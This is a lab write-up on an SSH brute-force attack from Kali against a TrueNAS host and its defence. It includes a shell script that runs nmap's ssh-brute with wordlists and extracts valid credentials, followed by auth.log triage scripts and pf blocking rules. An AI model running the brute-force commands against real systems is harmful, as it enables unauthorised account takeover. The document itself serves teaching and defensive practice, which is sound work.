Cybersecurity · NAS Security Attack & Defense Lab · Lab 1 — SSH Brute Force Attack

Lab 1 — SSH Brute Force Attack

Attack: SSH brute-force from Kali against a TrueNAS 13.1 host. Defense: detect in logs and block the attacker with pf.

Scenario

A TrueNAS server and a Kali Linux host run on a segmented lab network. Kali performs reconnaissance, finds SSH (port 22) open, and launches a brute-force attempt with Nmap's ssh-brute NSE script. On defense, the activity is detected in /var/log/auth.log (where sshd logs on the FreeBSD-based TrueNAS CORE) and the source IP is immediately blocked with pf, the system firewall.

Offensive

Port 22 (SSH) discovered open

Screenshot (Nmap results showing port 22 open on the target): Nmap shows SSH exposed on the target host.

Brute-force with NSE ssh-brute

Screenshot (Nmap NSE ssh-brute configuration/command): configuring the ssh-brute NSE script with its user and password lists.
Screenshot (ssh-brute attack running against the target): brute-force in progress from Kali.
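The two offensive steps as commands, with a parser for the script's result block. This is an added example, not the lab's own command line: TARGET, the wordlists and SAMPLE_OUTPUT are constructed here (point TARGET at a host you own; userdb/passdb, brute.firstonly and ssh-brute.timeout are Nmap's own script arguments).

```shell
#!/bin/sh
# Added example, not the lab's own commands: nmap invocations for discovery and
# for the ssh-brute run, plus a parser for the script's "Accounts:" report.
# TARGET, the wordlists and SAMPLE_OUTPUT are constructed for this example.
TARGET="${TARGET:-192.0.2.20}"   # assumed address of the TrueNAS lab host

# Step 1: confirm SSH is open and grab its banner (-sV).
discovery_cmd() {
    printf 'nmap -Pn -p 22 -sV %s' "$1"
}

# Step 2: the brute-force run. userdb/passdb are the unpwdb library's wordlist
# arguments, brute.firstonly stops at the first hit, ssh-brute.timeout is the
# script's per-connection timeout.
ssh_brute_cmd() {
    printf 'nmap -Pn -p 22 --script ssh-brute --script-args userdb=%s,passdb=%s,brute.firstonly=true,ssh-brute.timeout=5s %s' \
        "$1" "$2" "$3"
}

# Tiny constructed wordlists; a real run uses a proper list (e.g. SecLists).
make_wordlists() {
    printf '%s\n' root admin truenas > "$1"
    printf '%s\n' admin password truenas123 > "$2"
}

# The brute library prints every hit as "<user>:<pass> - Valid credentials";
# reduce nmap's report to those pairs.
valid_creds() {
    awk '/ - Valid credentials/ { sub(/^[| _]+/, ""); sub(/ - Valid credentials.*/, ""); print }'
}

# Constructed sample of what nmap prints for one successful guess.
SAMPLE_OUTPUT='PORT   STATE SERVICE
22/tcp open  ssh
| ssh-brute:
|   Accounts:
|     admin:admin - Valid credentials
|_  Statistics: Performed 9 guesses in 3 seconds, average tps: 3.0'

creds_from_sample() {
    printf '%s\n' "$SAMPLE_OUTPUT" | valid_creds
}

# The scan itself only runs with RUN_SCAN=1 on a box that has nmap installed.
if [ "${RUN_SCAN:-0}" = 1 ] && command -v nmap >/dev/null 2>&1; then
    make_wordlists users.lst pass.lst
    sh -c "$(discovery_cmd "$TARGET")"
    sh -c "$(ssh_brute_cmd users.lst pass.lst "$TARGET")" | valid_creds
fi
```

Run it as `RUN_SCAN=1 TARGET=<lab host> sh brute.sh`; without RUN_SCAN it only defines the functions, which is what the assertions below exercise.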

Defensive

Incident Detection

Review the authentication log on the server to confirm repeated failures and identify the source IP. On TrueNAS CORE (FreeBSD) sshd writes to /var/log/auth.log, readable only by root; the lines to look for are "Failed password for <user> from <IP>" and "Failed password for invalid user <user> from <IP>", and a burst of them from one address across many usernames is the brute-force signature.

Screenshot (/var/log/auth.log entries with repeated failures): auth log review shows repeated SSH failures.
Screenshot (additional log view showing usernames tried): usernames attempted from the attacker IP.
Screenshot (concatenated log showing multiple brute-force attempts): the concatenated view highlights the brute-force pattern.
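The same triage as a repeatable script: failures per source address, the usernames tried from a given address, and the address to contain once it crosses a threshold. This is an added example, not the lab's own commands; the log lines are constructed to match FreeBSD sshd's format, with 192.0.2.10 as the attacker and 198.51.100.5 as a legitimate admin who mistyped a password once, and the threshold of 5 is an assumption.

```shell
#!/bin/sh
# Added example, not the lab's own commands: triage over /var/log/auth.log.
# SAMPLE_LOG is constructed in FreeBSD sshd's format; 192.0.2.10 is the
# attacker, 198.51.100.5 a legitimate admin with one typo.
SAMPLE_LOG='Jun 10 14:02:11 truenas sshd[4011]: Invalid user admin from 192.0.2.10 port 50212
Jun 10 14:02:11 truenas sshd[4011]: Failed password for invalid user admin from 192.0.2.10 port 50212 ssh2
Jun 10 14:02:12 truenas sshd[4013]: Failed password for root from 192.0.2.10 port 50214 ssh2
Jun 10 14:02:12 truenas sshd[4015]: Failed password for invalid user truenas from 192.0.2.10 port 50216 ssh2
Jun 10 14:02:13 truenas sshd[4017]: Failed password for root from 192.0.2.10 port 50218 ssh2
Jun 10 14:02:13 truenas sshd[4019]: Failed password for invalid user backup from 192.0.2.10 port 50220 ssh2
Jun 10 14:02:14 truenas sshd[4019]: error: maximum authentication attempts exceeded for invalid user backup from 192.0.2.10 port 50220 ssh2 [preauth]
Jun 10 14:05:40 truenas sshd[4031]: Failed password for root from 198.51.100.5 port 60100 ssh2
Jun 10 14:05:48 truenas sshd[4031]: Accepted password for root from 198.51.100.5 port 60100 ssh2'

# Failed-password count per source IP, highest first.
failed_by_ip() {
    printf '%s\n' "$1" | awk '
        /sshd\[[0-9]+\]: Failed password for / {
            for (i = 1; i <= NF; i++) if ($i == "from") n[$(i+1)]++
        }
        END { for (ip in n) print n[ip], ip }' | sort -rn
}

# Distinct usernames tried from one IP. Handles both "for NAME from" and
# "for invalid user NAME from" (sshd marks non-existent accounts that way).
usernames_from() {
    printf '%s\n' "$1" | awk -v ip="$2" '
        /sshd\[[0-9]+\]: Failed password for / {
            src = ""; name = ""
            for (i = 1; i <= NF; i++) if ($i == "from") { src = $(i+1); break }
            if (src != ip) next
            for (i = 1; i <= NF; i++) if ($i == "for") {
                name = ($(i+1) == "invalid" && $(i+2) == "user") ? $(i+3) : $(i+1)
                break
            }
            print name
        }' | sort -u
}

# The address to contain: the top source, only if it has at least $2 failures
# (default 5, an assumed threshold) so a single admin typo is not blocked.
top_attacker() {
    failed_by_ip "$1" | awk -v min="${2:-5}" 'NR == 1 && $1 >= min { print $2 }'
}

# Demo over the constructed log (on the NAS: failed_by_ip "$(cat /var/log/auth.log)").
failed_by_ip "$SAMPLE_LOG"
usernames_from "$SAMPLE_LOG" "$(top_attacker "$SAMPLE_LOG")"
```

On the real host run it as root (auth.log is mode 600) and include rotated copies, which FreeBSD's default newsyslog settings compress as auth.log.0.bz2 and so on, since a slow brute force can span a rotation. The "maximum authentication attempts exceeded" line is worth its own grep: it shows sshd's per-connection limit being hit, which is exactly what a scripted attack does and an admin almost never does.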

Immediate Containment with pf

Block the attacker to stop further attempts while you continue incident response.

1) Ensure pf is enabled

# enable pf (if not already; "pfctl: pf already enabled" just means there is nothing to do)
sudo pfctl -e

# list the currently loaded rules (pfctl -si reports whether pf itself is enabled)
sudo pfctl -sr

If pfctl instead complains that /dev/pf does not exist, the pf kernel module is not loaded; load it with kldload pf and enable again.
Screenshot (verifying pf status and enabling if necessary): confirming the firewall is active.

2) Add a block rule for the attacker IP

Edit /etc/pf.conf and add the following line, replacing ATTACKER_IP with the source address taken from the log. quick makes pf act on this rule at the first match, so the block applies regardless of any later pass rule:

block in quick from ATTACKER_IP to any
Screenshot (editing pf.conf to block the attacker IP): blocking the attacker in pf.conf.

3) Load the updated rules and verify

sudo pfctl -f /etc/pf.conf
sudo pfctl -sr   # the block rule should now be listed

pfctl -f replaces the loaded ruleset with the contents of the file. pf passes any packet that no rule matches, so a file that contains only this block rule cuts off the attacker without affecting other traffic and cannot lock you out.
Screenshot (reloading pf rules and listing ruleset): rules reloaded; the block is active.

This immediately cuts off the brute-force source while you proceed with standard IR: scoping, additional log review, credential hygiene, and hardening. One caveat: TrueNAS CORE does not expect its base system files to be edited by hand, and a manual change to /etc/pf.conf may not survive a reboot or update, so for anything longer than immediate containment apply the rule from a post-init script rather than relying on the edited file.
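The three containment steps as one script, with the attacker addresses kept in a pf table so further sources can be added live with pfctl -t instead of editing and reloading the file each time. This is an added example, not the lab's own commands; the ruleset text, the admin network 198.51.100.0/24, the path in RULES and the table name are assumptions for a lab setup.

```shell
#!/bin/sh
# Added example, not the lab's own commands: containment with a pf table.
# ADMIN_NET, RULES and the table name "bruteforce" are assumptions.
ADMIN_NET="${ADMIN_NET:-198.51.100.0/24}"  # assumed management subnet
RULES="${RULES:-/tmp/pf-bruteforce.conf}"   # on the real host: /etc/pf.conf

# Accept only a plain IPv4 address or CIDR prefix. The value comes out of a log
# the attacker partly controls, so it must never reach pfctl unchecked.
valid_ipv4() {
    case $1 in */*) ip=${1%%/*}; prefix=${1#*/} ;; *) ip=$1; prefix=32 ;; esac
    case $prefix in ''|*[!0-9]*) return 1 ;; esac
    [ "$prefix" -le 32 ] || return 1
    printf '%s\n' "$ip" | awk -F. '
        NF != 4 { exit 1 }
        { for (i = 1; i <= 4; i++) if ($i !~ /^[0-9]+$/ || $i > 255) exit 1 }'
}

# The ruleset. Order matters because of "quick" (first match wins): the admin
# pass comes first so operator SSH keeps working even if the wrong address ends
# up in the table; "persist" keeps the table when no rule references it; "log"
# sends blocked packets to pflog0 when the pflog module is loaded.
pf_ruleset() {
    cat <<EOF
table <bruteforce> persist { $1 }
pass in quick proto tcp from $ADMIN_NET to any port 22
block in log quick from <bruteforce> to any
EOF
}

# Write the ruleset for one attacker; on a host with pfctl, enable pf, check
# the syntax, load it and show the result. Elsewhere just print the ruleset.
contain() {
    valid_ipv4 "$1" || { echo "refusing to block '$1': not an IPv4 address" >&2; return 1; }
    pf_ruleset "$1" > "$RULES"
    if command -v pfctl >/dev/null 2>&1; then
        pfctl -e 2>/dev/null || true          # "already enabled" is fine
        pfctl -nf "$RULES" &&                 # parse only, catch typos first
        pfctl -f "$RULES" &&
        pfctl -sr && pfctl -t bruteforce -T show
    else
        cat "$RULES"
    fi
}

# Later sources go straight into the live table, no reload needed:
#   pfctl -t bruteforce -T add 192.0.2.11
#   pfctl -t bruteforce -T delete 192.0.2.11
contain "${1:-192.0.2.10}"   # 192.0.2.10 is the constructed attacker address
```

Run `sh contain.sh <attacker IP>` on the NAS. The pfctl -nf step is the cheap insurance: a syntax error in the file would otherwise leave the old ruleset loaded while pfctl -sr still looks plausible.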
